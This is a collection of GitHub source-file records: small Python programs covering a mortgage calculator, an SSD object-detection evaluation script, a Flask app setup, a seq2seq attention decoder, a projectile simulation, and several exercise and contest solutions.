keep running or exit\n print(\"Enter 1 for mortgage calculator\")\n print(\"Enter 2 to exit\")\n \n choice = input(\"Enter your choice: \")\n\n while choice != \"1\" and choice != \"2\":\n print(\"Please enter a valid choice: \")\n choice = input(\"Enter 1 to calculate a mortgage payment or 2 to exit: \")\n print(\"----------------------------------------\")\n\n while choice == \"1\":\n # Enter the variables for the calculation\n while True:\n try:\n yearly_percentage_rate = float(input(\"What is the yearly percentage rate? Enter as a decimal: \"))\n print(\"----------------------------------------\")\n break\n except ValueError:\n print(\"Please enter a valid yearly percentage rate.\")\n \n while True:\n try:\n loan_term = int(input(\"What is the duration of the mortgage? \"))\n print(\"----------------------------------------\")\n break\n except ValueError:\n print(\"Please enter a valid loan term.\")\n \n while True:\n try:\n principal = float(input(\"What is the amount borrowed? $\"))\n print(\"----------------------------------------\")\n break\n except ValueError:\n print(\"Please enter a valid amount.\")\n\n mortgage1 = MortgageCalculator(yearly_percentage_rate, loan_term, principal)\n\n print(mortgage1.number_payments())\n print(\"----------------------------------------\")\n\n print(mortgage1.monthly_percentage())\n print(\"----------------------------------------\")\n\n print(mortgage1.calculate_monthly_payment())\n print(\"----------------------------------------\")\n\n mortgage1.calculate_debt_schedule()\n print(\"----------------------------------------\")\n\n choice = int(input(\"Enter 1 to calculate another mortgage payment or 2 to exit: \"))\n print(\"----------------------------------------\")\n \n\nrun_calculator()","repo_name":"sivers1985/Mortgage_Calculator","sub_path":"Mortgage_Calculator.py","file_name":"Mortgage_Calculator.py","file_ext":"py","file_size_in_byte":4021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30299004952","text":"from __future__ import print_function\nimport sys\nimport os\nimport argparse\nimport torch\nimport torch.nn as nn\nimport torch.backends.cudnn as cudnn\nimport torchvision.transforms as transforms\nfrom torch.autograd import Variable\nimport torch.utils.data as data\nfrom PIL import Image\nimport _init_paths\nfrom lib.core import ssd_config as cfg\nfrom utils.blob import BaseTransform\nfrom datasets.coco_test import COCODetection\nfrom modeling.SSD import build_ssd\nimport time\nimport numpy as np\n\nparser = argparse.ArgumentParser(description='Single Shot MultiBox Detection')\nparser.add_argument('--trained_model', default=cfg.PRETRAINED_WEIGHT,\n type=str, help='Trained state_dict file path to open')\nparser.add_argument('--save_folder', default='eval/', type=str,\n help='Dir to save results')\nparser.add_argument('--visual_threshold', default=0.6, type=float,\n help='Final confidence threshold')\nparser.add_argument('--cuda', default=True, type=bool,\n help='Use cuda to train model')\nparser.add_argument('--coco_root', default=cfg.COCO_ROOT, help='Location of COCO/VOC root directory')\nparser.add_argument('-f', default=None, type=str, help=\"Dummy arg so we can load in Jupyter Notebooks\")\nargs = parser.parse_args()\n\nif args.cuda and torch.cuda.is_available():\n torch.set_default_tensor_type('torch.cuda.FloatTensor')\nelse:\n torch.set_default_tensor_type('torch.FloatTensor')\n\nif not os.path.exists(args.save_folder):\n os.mkdir(args.save_folder)\n\n\ndef test_net(save_folder, net, cuda, testset, transform, thresh):\n # dump predictions and assoc. ground truth to text file for now\n filename = save_folder+'test_result_new.txt'\n num_images = len(testset)\n print('~~~~~~~~~~~~~~~~~: ', num_images)\n all_boxes = [[[] for _ in range(num_images)]\n for _ in range(len(cfg.COCO_CLASSES)+1)]\n for i in range(num_images):\n im, gt, h, w = testset.pull_item(i)\n\n print('Testing image {:d}/{:d}....'.format(i+1, num_images))\n img = testset.pull_image(i)\n img_id, annotation = testset.pull_anno(i)\n x = torch.from_numpy(transform(img)[0]).permute(2, 0, 1)\n x = Variable(x.unsqueeze(0))\n\n # with open(filename, mode='a') as f:\n # f.write('\\nGROUND TRUTH FOR: '+str(img_id)+'\\n')\n # for box in annotation:\n # f.write('label: '+' || '.join(str(b) for b in box)+'\\n')\n if cuda:\n x = x.cuda()\n t0 = time.time()\n y = net(x) # forward pass\n detections = y.data\n # # scale each detection back up to the image\n # scale = torch.Tensor([img.shape[1], img.shape[0],\n # img.shape[1], img.shape[0]])\n t1 = time.time()\n print('timer: %.4f sec.' % (t1 - t0),flush=True)\n pred_num = 0\n for j in range(1, detections.size(1)):\n # # if i!=0:\n # j = 0\n # while detections[0, i, j, 0] >= 0.1:\n # if pred_num == 0:\n # with open(filename, mode='a') as f:\n # f.write(str(img_id)+'\\n')\n # score = detections[0, i, j, 0]\n # label_name = labelmap[i-1]\n # pt = (detections[0, i, j, 1:]*scale).cpu().numpy()\n # coords = (pt[0], pt[1], pt[2], pt[3])\n # pred_num += 1\n # with open(filename, mode='a') as f:\n # f.write(str(pred_num)+' label: '+str(i)+' score: ' +\n # str(score) + ' '.join(str(c) for c in coords) + '\\n')\n # j += 1\n k = 0\n inds = np.where(detections[0, j, k, 0] > 0.01)[0]\n if len(inds) == 0:\n all_boxes[j][i] = np.empty([0, 5], dtype=np.float32)\n continue\n dets = detections[0, j, :]\n mask = dets[:, 0].gt(0.).expand(5, dets.size(0)).t()\n dets = torch.masked_select(dets, mask).view(-1, 5)\n if dets.size(0) == 0:\n continue\n boxes = dets[:, 1:]\n boxes[:, 0] *= w\n boxes[:, 2] *= w\n boxes[:, 1] *= h\n boxes[:, 3] *= h\n scores = dets[:, 0].cpu().numpy()\n cls_dets = np.hstack((boxes.cpu().numpy(),\n scores[:, np.newaxis])).astype(np.float32,\n copy=False)\n all_boxes[j][i] = cls_dets\n k += 1\n\n print('im_detect: {:d}/{:d}'.format(i + 1, num_images))\n print('Evaluating detections')\n testset.evaluate_detections(all_boxes,save_folder)\n # evaluate_detections(all_boxes, output_dir, test_net)\n\n# def evaluate_detections(box_list, output_dir, dataset):\n # write_voc_results_file(box_list, dataset)\n # do_python_eval(output_dir)\n\n\n\ndef test_coco():\n # load net\n num_classes = len(cfg.COCO_CLASSES) + 1 # +1 background\n print('num of class: ', num_classes)\n net = build_ssd('test', 300, num_classes) # initialize SSD\n net.load_state_dict(torch.load(args.trained_model))\n net.eval()\n print('Finished loading model!')\n # load data\n testset = COCODetection(args.coco_root)\n if args.cuda:\n net = net.cuda()\n cudnn.benchmark = True\n # evaluation\n test_net(args.save_folder, net, args.cuda, testset,\n BaseTransform(net.size, (104, 117, 123)),\n thresh=args.visual_threshold)\n\nif __name__ == '__main__':\n test_coco()\n","repo_name":"wdd0225/RetinaNet-and-SSD-in-PyTorch-Detectron","sub_path":"tools/test_coco_eval.py","file_name":"test_coco_eval.py","file_ext":"py","file_size_in_byte":5540,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"5162692569","text":"class PlayerDetail(object):\n def __init__(self, info: list):\n super(PlayerDetail, self).__init__()\n self.index = int(info[0])\n self.name = info[1]\n self.top_win_handler = int(info[2])\n self.bind_win_handler = int(info[3])\n self.is_in_android = True if int(info[4]) == 1 else False\n self.pid = int(info[5])\n self.virtual_box_pid = int(info[6])\n\n def is_running(self) -> bool:\n return self.is_in_android\n\n def __str__(self):\n index = self.index\n name = self.name\n r = str(self.is_in_android)\n twh = self.top_win_handler\n bwh = self.bind_win_handler\n pid = self.pid\n virtual_box_pid = self.virtual_box_pid\n return \"\\n index:%d name:%s top:%08X bind:%08X running:%s pid:%d virtual_box_pid:%d\\n\" % (\n index, name, twh, bwh, r, pid, virtual_box_pid)\n","repo_name":"1057234721/Game","sub_path":"Crack_Onmyoji/player_detail.py","file_name":"player_detail.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"37025869128","text":"\"\"\"Initialize app.\"\"\"\nfrom flask import Flask, render_template, session\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_login import LoginManager\n\nimport os\n\n\ndb = SQLAlchemy()\nlogin_manager = LoginManager()\n\n\ndef template_render(item, template_name):\n return render_template(os.path.join(item, template_name))\n\n\ndef create_app():\n \"\"\"Construct the core app object.\"\"\"\n app = Flask(__name__, instance_relative_config=False)\n\n # Application Configuration\n app.config.update(TESTING=True,\n DEBUG=True,\n SECRET_KEY=\"104838b865614f38846c2a9f37a2d86d\", #secret key\n SQLALCHEMY_DATABASE_URI=\"sqlite:///daycare.db\", # db name\n SQLALCHEMY_ECHO=False,\n SQLALCHEMY_TRACK_MODIFICATIONS=False\n )\n\n # Initialize Plugins\n db.init_app(app)\n login_manager.init_app(app)\n\n with app.app_context():\n from app import home_routes, login_routes, profile_routes, main_routes, manager_routes\n\n app.register_blueprint(home_routes.home_bp)\n\n # Register Blueprints\n app.register_blueprint(login_routes.login_bp)\n app.register_blueprint(profile_routes.profile_bp)\n app.register_blueprint(main_routes.main_bp)\n app.register_blueprint(manager_routes.manager_bp)\n\n # Create Database Models)\n db.create_all()\n\n return app\n","repo_name":"jatinder869/PetDayCare","sub_path":"app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9251896129","text":"import torch\nimport torch.nn as nn\nfrom bahdanau_attention import BahdanauAttention\nimport torch.nn.functional as F\nimport numpy\nclass Decoder(nn.Module):\n def __init__(self, emb_size, hidden_size, attention, num_layers=1, dropout=0.5,\n bridge=True, inputfeeding=False, soft=True):\n super(Decoder, self).__init__()\n\n self.hidden_size = hidden_size\n self.num_layers = num_layers\n self.attention = attention\n self.dropout = dropout\n self.inputfeeding = inputfeeding\n self.soft = soft\n \n self.rnn_feed = nn.LSTM(emb_size + 2 * hidden_size, hidden_size, num_layers,\n batch_first=True, dropout=dropout)\n self.rnn_nofeed = nn.LSTM(emb_size, hidden_size, num_layers,\n batch_first=True, dropout=dropout)\n # self.rnn = nn.GRU(emb_size + 2 * hidden_size, hidden_size, num_layers,\n # batch_first=True, dropout=dropout)\n\n self.bridgeh = nn.Linear(2 * hidden_size, hidden_size, bias=True) if bridge else None\n self.bridgec = nn.Linear(2 * hidden_size, hidden_size, bias=True) if bridge else None\n self.dropout_layer = nn.Dropout(p=dropout)\n self.pre_output_layer = nn.Linear(hidden_size + 2 * hidden_size + emb_size,\n hidden_size, bias=False)\n self.pre_output_layer_hard = nn.Linear(hidden_size + emb_size,\n hidden_size, bias=False)\n\n\n def forward_step(self, prev_embed, encoder_hidden, src_mask, hidden, cell,\n context):\n # input feeding\n if self.inputfeeding:\n rnn_input = torch.cat([prev_embed, context], dim=2)\n output, (hidden, cell) = self.rnn_feed(rnn_input, (hidden, cell))\n else:\n rnn_input = prev_embed\n output, (hidden, cell) = self.rnn_nofeed(rnn_input, (hidden, cell))\n query = hidden[-1].unsqueeze(1)\n context, atten_probs = self.attention(query=query,\n value=encoder_hidden, mask=src_mask)\n pre_output = torch.cat([prev_embed, output, context], dim=2) \n pre_output = self.dropout_layer(pre_output)\n pre_output = self.pre_output_layer(pre_output)\n\n return output, hidden, cell, context, pre_output\n\n def decode_soft(self, trg_embed, encoder_hidden, encoder_final,\n src_mask, trg_mask, hidden=None, cell=None, max_len=None):\n if hidden is None:\n hidden = self.init_hidden(encoder_final[0])\n \n if cell is None:\n cell = self.init_cell(encoder_final[1])\n \n decoder_states = []\n pre_output_vectors = []\n context = torch.zeros(encoder_hidden.shape[0], 1, 2 * hidden.shape[-1])\n for i in range(max_len):\n prev_embed = trg_embed[:, i].unsqueeze(1)\n\n output, hidden, cell, context, pre_output = self.forward_step(\n prev_embed, encoder_hidden, src_mask, hidden, cell, context\n )\n decoder_states.append(output)\n pre_output_vectors.append(pre_output)\n\n decoder_states = torch.cat(decoder_states, dim=1)\n pre_output_vectors = torch.cat(pre_output_vectors, dim=1)\n return decoder_states, (hidden, cell), pre_output_vectors\n\n def forward(self, trg_embed, encoder_hidden, encoder_final,\n src_mask, trg_mask, hidden=None, cell=None, max_len=None):\n \n if max_len is None:\n max_len = trg_mask.size(-1)\n if self.soft:\n return self.decode_soft(trg_embed, encoder_hidden, encoder_final,\n src_mask, trg_mask, hidden, cell, max_len)\n return self.decode_hard(trg_embed, encoder_hidden, encoder_final,\n src_mask, trg_mask, hidden, cell, max_len)\n\n def init_hidden(self, encoderh_final):\n if encoderh_final is None:\n return None\n \n return torch.tanh(self.bridgeh(encoderh_final))\n\n def init_cell(self, encoderc_final):\n if encoderc_final is None:\n return None\n \n return torch.tanh(self.bridgec(encoderc_final))\n\n\n def decode_hard(self, trg_embed, encoder_hidden, encoder_final,\n src_mask, trg_mask, hidden=None, cell=None, max_len=None):\n if hidden is None:\n hidden = self.init_hidden(encoder_final[0])\n if cell is None:\n cell = self.init_cell(encoder_final[1])\n # proj_key = self.attention.key_layer(encoder_hidden)\n decoder_states = []\n pre_output_vectors = []\n for i in range(max_len):\n prev_embed = trg_embed[:, i].unsqueeze(1)\n output, hidden, cell, pre_output = self.forward_step_hard(\n prev_embed, encoder_hidden, src_mask, hidden, cell, decoder_states)\n pre_output_vectors.append(pre_output)\n\n decoder_states = torch.cat(decoder_states, dim=1)\n pre_output_vectors = torch.cat(pre_output_vectors, dim=1)\n return decoder_states, (hidden, cell), pre_output_vectors\n\n def forward_step_hard(self, prev_embed, encoder_hidden, src_mask, hidden, cell, decoder_states):\n output, (hidden, cell) = self.rnn_nofeed(prev_embed, (hidden, cell))\n decoder_states.append(output)\n query = hidden[-1].unsqueeze(1)\n atten_probs, encoder_proj = self.attention(query=query,#torch.cat(decoder_states, dim=1),\n value=encoder_hidden, mask=src_mask)\n # decoder_hidden = torch.FloatTensor(decoder_states)\n outputs = None\n for i in range(len(encoder_proj[0])):\n temp_out = torch.tanh(decoder_states[-1].squeeze(1) + encoder_proj[:,i])\n \n #logsoftmax\n temp_out = F.softmax(temp_out, dim=-1)\n temp_out = temp_out.unsqueeze(1)\n if outputs is None:\n outputs = temp_out\n else:\n outputs = torch.cat((outputs, temp_out), dim=1)\n\n final_out = torch.bmm(atten_probs, outputs)\n final_out = torch.log(final_out)\n final_out = torch.cat([prev_embed, final_out], dim=2)\n final_out = self.dropout_layer(final_out)\n final_out = self.pre_output_layer_hard(final_out)\n return output, hidden, cell, final_out\n ","repo_name":"JamesLuoyh/character-level-soft-and-hard-attention","sub_path":"decoder.py","file_name":"decoder.py","file_ext":"py","file_size_in_byte":6298,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"32798733124","text":"import pytest\nimport json\nfrom productporter.product.phapi import ProductHuntAPI\nfrom productporter.product.models import Product\n# Use the development configuration if available\ntry:\n from productporter.configs.development import DevelopmentConfig as Config\nexcept ImportError:\n from productporter.configs.default import DefaultConfig as Config\n\n@pytest.fixture(scope=\"session\")\ndef some_day():\n \"\"\"Return some old day of date\"\"\"\n return '2014-12-16'\n\n@pytest.fixture(scope=\"session\")\ndef some_posts(some_day):\n \"\"\"\n Pull posts from producthunt.com with offical API\n \"\"\"\n if Config.PH_API_USE_SAMPLE_DATA:\n from sampledata import SAMPLE_DATA\n jsondata = json.loads(SAMPLE_DATA)\n return jsondata['posts']\n else:\n api = ProductHuntAPI()\n return api.posts(some_day)\n\n@pytest.fixture()\ndef db_posts(database, some_posts):\n \"\"\"\n Pull posts from producthunt.com with offical API\n And save to database as sample test data\n \"\"\"\n postids=[]\n for jsondata in some_posts:\n pi = Product.query.filter(Product.postid==jsondata['id']).first()\n assert pi is None\n pi = Product.from_json(jsondata)\n pi.save()\n postids.append(pi.postid)\n\n return postids\n\n","repo_name":"kamidox/weixin_producthunt","sub_path":"tests/fixtures/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"61"} +{"seq_id":"29694925044","text":"# Напишите класс для хранения информации о человеке:\n# ФИО, возраст и т.п. на ваш выбор.\n# У класса должны быть методы birthday для увеличения\n# возраста на год, full_name для вывода полного ФИО и т.п. на\n# ваш выбор.\n# Убедитесь, что свойство возраст недоступно для прямого\n# изменения, но есть возможность получить текущий возраст\n\n\nclass Human:\n\n def __init__(self, firstname: str, lastname: str, age: int, gender: str):\n self.firstname = firstname\n self.lastname = lastname\n self.__age = age\n self.gender = gender\n\n def get_age(self):\n return self.__age\n\n def birthday(self):\n self.__age += 1\n\n def __str__(self):\n return f'{self.firstname} {self.lastname} {self.get_age()} {self.gender}'\n\n\n\n\n\n\nif __name__ == '__main__':\n h_1 = Human('Иван', 'Иванов', 23, 'мужской')\n h_2 = Human('Петр', 'Сидоров', 40, 'мужской')\n print(h_1)\n print(h_2)\n h_1.birthday()\n h_2.birthday()\n print(h_1)\n print(h_2)\n","repo_name":"SergeiEremkin/GeekBrains","sub_path":"seminar_10/human.py","file_name":"human.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"5698527116","text":"# Baekjoon Online Judge - 1051번. 숫자 정사각형\n\n\nN, M = map(int, input().split())\narr = []\nresult = 0\nfor _ in range(N):\n arr.append(list(map(int, input())))\n\nmin_val = min(N, M) # 정사각형을 만들기 위해 N과 M값중 최소를 구함\n\n# 하나씩 다 돌며 정사각형을 만들 수 있는 꼭지점들을 체크해준다\nfor i in range(N):\n for j in range(M):\n for k in range(min_val):\n if i + k < N and j + k < M and (arr[i][j] == arr[i + k][j] == arr[i][j + k] == arr[i + k][j + k]):\n result = max(result, (k + 1) ** 2)\nprint(result)\n","repo_name":"wnstj-yang/Algorithm","sub_path":"BOJ/BOJ_1051.py","file_name":"BOJ_1051.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"28123045128","text":"\"\"\"\n\"\"\"\nimport numpy as np\nimport h5py\n\nclass DetectorPointCloud:\n \"\"\"\n \"\"\"\n def __init__(self):\n self.clear()\n \n def clear(self):\n self.x = []\n self.y = []\n self.z = []\n self.t_drift = []\n self.ts_pps = []\n self.Q = []\n self.E = []\n self.segment_id = []\n\n self.source_label = []\n self.topology_label = []\n self.particle_label = []\n self.physics_label = []\n\n self.unique_topology = []\n self.unique_particle = []\n self.unique_physics = []\n\n\n def add_point(self,\n x, y, z, t_drift, ts_pps, Q, E, segment_id\n ):\n self.x.append(x)\n self.y.append(y)\n self.z.append(z)\n self.t_drift.append(t_drift)\n self.ts_pps.append(ts_pps)\n self.Q.append(Q)\n self.E.append(E)\n self.segment_id.append(segment_id)\n\n self.source_label.append(-1)\n self.topology_label.append(-1)\n self.particle_label.append(-1)\n self.physics_label.append(-1)\n\n self.unique_topology.append(-1)\n self.unique_particle.append(-1)\n self.unique_physics.append(-1)\n ","repo_name":"Neutron-Calibration-in-DUNE/ArrakisND","sub_path":"arrakis_nd/dataset/det_point_cloud.py","file_name":"det_point_cloud.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34426029726","text":"class BankAccount:\r\n def __init__(self, account_number, balance, date_of_opening, customer_name):\r\n self.account_number = account_number\r\n self.balance = balance\r\n self.date_of_opening = date_of_opening\r\n self.customer_name = customer_name\r\n\r\n def deposit(self, amount):\r\n if amount > 0:\r\n self.balance += amount\r\n print(f\"Deposit of Rs. {amount} successful.\")\r\n else:\r\n print(\"Invalid amount. Deposit failed.\")\r\n\r\n def withdraw(self, amount):\r\n if amount > 0 and amount <= self.balance:\r\n self.balance -= amount\r\n print(f\"Withdrawal of Rs. {amount} successful.\")\r\n else:\r\n print(\"Insufficient balance. Withdrawal failed.\")\r\n\r\n def check_balance(self):\r\n print(f\"Account balance: Rs. {self.balance}\")\r\n\r\naccount = BankAccount(\"1234567890\", 5000, \"2022-01-01\", \"John Doe\")\r\n\r\naccount.check_balance() \r\n\r\naccount.deposit(2000) \r\naccount.check_balance() \r\n\r\naccount.withdraw(3000) \r\naccount.check_balance() \r\naccount.withdraw(5000) \r\naccount.check_balance() \r\n","repo_name":"pooja4034/Python","sub_path":"Assignment/2.24.py","file_name":"2.24.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13350735214","text":"import sys\nimport pandas as pd\nfrom pandas.util.testing import assert_frame_equal\nsys.path.insert(1,\"../../\")\nfrom h2o.frame import H2OFrame\nfrom tests import pyunit_utils\n\ndef pubdev_6360():\n source = [\n [1, 'Peter', 'blah'],\n [2, 'Carl', ''],\n [3, 'Maria', 'whatever'],\n [4, 'Cindy', None]\n ]\n expected = [\n [1, 'Peter', 1],\n [2, 'Carl', 0],\n [3, 'Maria', 1],\n [4, 'Cindy', 0]\n ]\n columns = ['ID', 'Name', 'testcolumn']\n sourcePandasFrame = pd.DataFrame(source, columns=columns)\n expectedPandasFrame = pd.DataFrame(expected, columns=columns)\n\n h2oFrame = H2OFrame(sourcePandasFrame)\n h2oFrame[h2oFrame['testcolumn'] != '', 'testcolumn'] = '1'\n try:\n h2oFrame[h2oFrame['testcolumn'] == '', 'testcolumn'] = '0'\n assert False, \"H2O Frame operation should fail on an enum column\"\n except Exception as e:\n assert 'Cannot assign value 1 into a vector of type Enum.' == e.args[\n 0].msg, \"H2O Frame operation failed on an unexpected error\"\n\n h2oFrame = H2OFrame(sourcePandasFrame)\n h2oFrame['testcolumn'] = h2oFrame['testcolumn'].ascharacter()\n h2oFrame[h2oFrame['testcolumn'] != '', 'testcolumn'] = '1'\n h2oFrame[h2oFrame['testcolumn'] == '', 'testcolumn'] = '0'\n h2oFrame['testcolumn'] = h2oFrame['testcolumn'].asfactor()\n\n assert_frame_equal(h2oFrame.as_data_frame(use_pandas=True), expectedPandasFrame)\n\n\nif __name__ == \"__main__\":\n pyunit_utils.standalone_test(pubdev_6360)\nelse:\n pubdev_6360()\n","repo_name":"h2oai/h2o-3","sub_path":"h2o-py/tests/testdir_jira/pyunit_pubdev_6360.py","file_name":"pyunit_pubdev_6360.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":6553,"dataset":"github-code","pt":"61"} +{"seq_id":"41817057589","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\nclass Particle:\n def __init__(self):\n self.t = []\n self.x = []\n self.y = []\n self.vx = []\n self.vy = []\n self.ay =[]\n self.ax = []\n \n def set_initial_conditions(self,x0,y0,kut,v0,p,c,A,m):\n self.t.append(0) \n self.x.append(x0)\n self.y.append(y0)\n self.v_x = v0 * np.cos(np.radians(kut))\n self.v_y = v0 * np.sin(np.radians(kut))\n self.vx.append(self.v_x)\n self.vy.append(self.v_y)\n self.a_x = 0\n self.a_y = 9.81\n self.ay.append(self.a_y)\n self.ax.append(self.a_x)\n self.g = 9.81\n self.dt = 0.01\n self.p = p\n self.c = c\n self.A = A \n self.m = m\n \n def A_f(self,kut):\n return self.A\n\n\n def reset(self):\n self.__init__()\n \n \n def __move(self):\n self.t.append(self.t[-1]+ self.dt)\n self.ax.append(-np.sign(self.vx[-1])*(self.p*self.c*self.A/2*self.m)*self.vx[-1]**2)\n self.ay.append(-self.g-np.sign(self.vy[-1])*(self.p*self.c*self.A/2*self.m)*self.vy[-1]**2)\n self.vy.append(self.vy[-1]+self.ay[-1] * self.dt)\n self.vx.append(self.vx[-1]+self.ax[-1] * self.dt)\n self.x.append(self.x[-1]+self.vx[-1]*self.dt)\n self.y.append(self.y[-1]+self.vy[-1]*self.dt)\n \n \n def range(self,dt):\n while self.y[-1]>=0:\n self.__move()\n return self.x[-1]\n\n def plot_trajectory(self):\n self.range()\n plt.plot(self.x[:-1],self.y[:-1])\n plt.xlabel('x')\n plt.ylabel('y')\n plt.show()\n\n def a_rk(self,x,v,t):\n return -1*np.sign((v*self.p*self.c*self.A_f(np.radians(np.arctan(self.vy[-1]/self.vx[-1])))/2*self.m)*v**2)\n\n\n def runge_kutta(self):\n i=0\n while self.y[i]>=0:\n\n self.t.append(self.t[i-1]+self.dt)\n k1vx = (self.a_rk(self.x[i-1],self.vx[i-1],self.t[i-1]))*self.dt\n k1x = self.vx[i-1]*self.dt\n k1vy = (-self.g + self.a_rk(self.x[i-1],self.vx[i-1],self.t[i-1]))*self.dt\n k1y = self.vy[i-1]*self.dt\n \n k2vx = (self.a_rk( self.x[i-1]+k1vx/2, self.vx[i-1]+k1vx/2,self.t[i-1]+self.dt/2))*self.dt\n k2x = (self.vx[i-1]+k1vx/2)*self.dt\n k2vy = (-self.g + self.a_rk( self.y[i-1]+k1vy/2, self.vy[i-1]+k1vy/2,self.t[i-1]+self.dt/2))*self.dt\n k2y = (self.vy[i-1]+k1vy/2)*self.dt\n\n k3vx = (self.a_rk(self.x[i-1]+k2vx/2,self.vx[i-1]+k2vx/2,self.t[i-1]+self.dt/2))*self.dt \n k3x = (self.vx[i-1]+k2vx/2)*self.dt\n k3vy = (-self.g + self.a_rk(self.y[i-1]+k2vy/2,self.vy[i-1]+k2vy/2,self.t[i-1]+self.dt/2))*self.dt \n k3y = (self.vy[i-1]+k2vy/2)*self.dt\n\n k4vx = (self.a_rk(self.x[i-1]+k3vx/2,self.vx[i-1]+k3vx/2,self.t[i-1]+self.dt/2))*self.dt\n k4x = (self.vx[i-1]+k3vx/2)*self.dt\n k4vy = (-self.g + self.a_rk( self.y[i-1]+k3vy/2, self.vy[i-1]+k3vy/2,self.t[i-1]+self.dt/2))*self.dt\n k4y = (self.vy[i-1]+k3vy/2)*self.dt\n\n self.vx.append(self.vx[i-1] +1/6*(k1vx + 2*k2vx + 2*k3vx +k4vx))\n self.vy.append(self.vy[i-1] +1/6*(k2vy + 2*k2vy + 2*k3vx +k4vy)) \n\n self.x.append(self.x[i-1]+1/6*(k1x + 2*k2x + 2*k3x +k4x))\n self.y.append(self.y[i-1]+1/6*(k1y + 2*k2y + 2*k3y +k4y))\n i+=1\n \n return self.x,self.y\n\n def a_kugla(self,kut):\n return self.stranica**2 * np.pi\n\n def a_kocka(self,kut):\n return self.stranica**2 * np.cos(kut)\n\n def kugla_kocka(self,stranica_a,vrsta='kugla'):\n self.stranica = stranica_a\n if vrsta == 'kugla':\n self.A_f= self.a_kugla\n else:\n self.A_f= self.a_kocka\n return self.runge_kutta()\n \n def meta(self,xm,ym,rm):\n for kut in range(1,90):\n self.set_initial_conditions(0,0,kut,5,0.0001,0.4,2,3)\n pogodeno=0\n xi,yi = self.runge_kutta()\n for i in range (len(xi)):\n if math.dist([ xi[i] ,yi[i]],[xm,ym])< rm:\n pogodeno = 1\n break\n self.reset()\n if pogodeno ==1:\n return kut,xi,yi\n return 0,[],[]\n \n\n\n\n \n \n","repo_name":"ir1is/PAF","sub_path":"vj_6/domaci_4/projectile.py","file_name":"projectile.py","file_ext":"py","file_size_in_byte":4343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32731808543","text":"# https://www.acmicpc.net/problem/1018\n\n\"\"\"\n8*8 타일이 정해진 이후\nB first or W first?\nB first일 때 타일\nW first일 때 타일\n\n둘 중 최소값 저장\n\"\"\"\n\n# a = 'abc'\n# b = 'abb'\n# c = sum(map(lambda x: int(*map(lambda y, z: 1 if y == z else 0, *x)), zip(a,b)))\n\nrefs = ('BWBWBWBW', 'WBWBWBWB')\n\ndef compare(tar, row):\n compA = sum(map(lambda x: int(*map(lambda y, z: 1 if y == z else 0, *x)), zip(tar, refs[0])))\n compB = sum(map(lambda x: int(*map(lambda y, z: 1 if y == z else 0, *x)), zip(tar, refs[1])))\n if row % 2:\n return (compA, compB)\n else:\n return (compB, compA)\n\nN, M = map(int, input().split())\n\nboard = []\n\nfor _ in range(N):\n board.append(input())\n\nresult = 64\n\nfor rowOffset in range(N-7):\n for colOffset in range(M-7):\n r = 0\n res = []\n for i in range(8):\n a = board[i+rowOffset][colOffset:colOffset+8]\n res.append(compare(a, i))\n r = min(map(sum, zip(*res)))\n if r < result:\n result = r\n\nprint(result)","repo_name":"ghleokim/codeTestProblems","sub_path":"baekjoon/1018_bruteForce.py","file_name":"1018_bruteForce.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23644203191","text":"#!/usr/bin/env python\n\nimport sys\n\ninp = open(sys.argv[1], \"r\")\nout = open(\"output.txt\", \"w+\")\n\ncount = int(inp.next())\nfor index in range(count):\n result_count = {}\n A, B = map(int, inp.next().split())\n for n in xrange(A, B+1):\n str_n = str(n)\n length = len(str_n)\n for i in xrange(length,0,-1):\n shift_n = int(str_n[i:length]+str_n[0:i])\n if (shift_n >= A) and (shift_n < n):\n for m in xrange(A, n):\n if shift_n == m:\n result_count[(shift_n, n)] = 1\n out.writelines(\"Case #%d: %d\\n\" % (index+1, len(result_count)))\n \ninp.close()\nout.close()","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_97/1662.py","file_name":"1662.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20917471177","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\ntry:\n name = input('Ener list of your name here:').title().split(\",\")\n assignments = input('Enter a number of assignments:').split(\",\")\n grades = input('Enter a list of grades:').split(\",\")\n \nexcept ValueError:\n print('That\\s not valid answr!')\n\nmessage = \"Hi {},\\n\\nThis is a reminder that you have {} assignments left to \\\nsubmit before you can graduate. You're current grade is {} and can increase \\\nto {} if you submit all assignments before the due date.\\n\\n\"\n\nfor name, assignments, grades in zip(name, assignments, grades):\n print(message.format(name,assignments,grades, int(assignments) + int(grades) 